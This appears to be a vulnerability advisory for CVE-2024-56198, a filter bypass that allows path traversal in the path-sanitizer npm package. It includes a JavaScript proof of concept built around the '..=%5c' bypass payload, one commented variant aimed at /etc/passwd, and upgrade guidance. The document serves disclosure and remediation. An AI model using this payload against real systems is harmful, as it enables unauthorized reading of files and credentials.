CVE-2024-56198
path-sanitizer allows bypassing the existing filters to achieve path-traversal vulnerability
Description
### Summary

This is a PoC for the path-sanitizer [npm package](https://www.npmjs.com/package/path-sanitizer). Its filters can be bypassed, resulting in path traversal. The payload `..=%5c` can be used to bypass the filters on the CLI (along with other candidates); something similar would likely work in web apps as well.

### PoC

Here is the code to test the filter bypass:

```js
const sanitize = require("path-sanitizer")
const path = require("path")
const fs = require("fs")

// Real scenario:
function routeHandler(myPath) {
  // Let's assume the path was extracted from the request.
  // We want to read a file in the C:\Users\user\Desktop\myApp\ directory,
  // but the user should only be able to access C:\Users\user\Desktop\,
  // so we need to sanitize the path.
  const APP_DIR = "/var/hacker"
  const sanitized = path.join(APP_DIR, sanitize(myPath))
  // Normally we would read the file here; in this PoC we just return the path.
  // console.log(sanitized)
  return sanitized
}

function readFile(filePath) {
  const absolutePath = path.resolve(filePath) // Resolve to an absolute path
  fs.readFile(absolutePath, "utf8", (err, data) => {
    if (err) {
      console.error(`Error reading the file: ${err.message}`)
      return
    }
    console.log(`Contents of the file ${filePath} :\n${data}`)
  })
}

// Bypass payload: "..=%5c" repeated, followed by the target file
const input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt"
// const input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd"
// Plain traversal payload, which the sanitizer is expected to block
const input_user_payload = "../../../../../../../../tmp/hacked.txt"

readFile(routeHandler(input_user_bypass))
readFile(routeHandler(input_user_payload))
```

Here is a video PoC (a Loom recording; only users with the video's UUID can view it): https://www.loom.com/share/b766ece5193842848ce7562fcd559256?sid=fd826eb6-0eee-4601-bf0e-9cfee5c56e9d

### Impact

Any CLI tool or library using this package can be, or will be, vulnerable to path traversal.
How to fix CVE-2024-56198
To fix CVE-2024-56198, upgrade the affected package to the patched version listed below.
- path-sanitizer: upgrade to 3.1.0 or later
Is CVE-2024-56198 being exploited?
Low: the EPSS score is 0.8%, and no large-scale exploitation activity has been observed so far.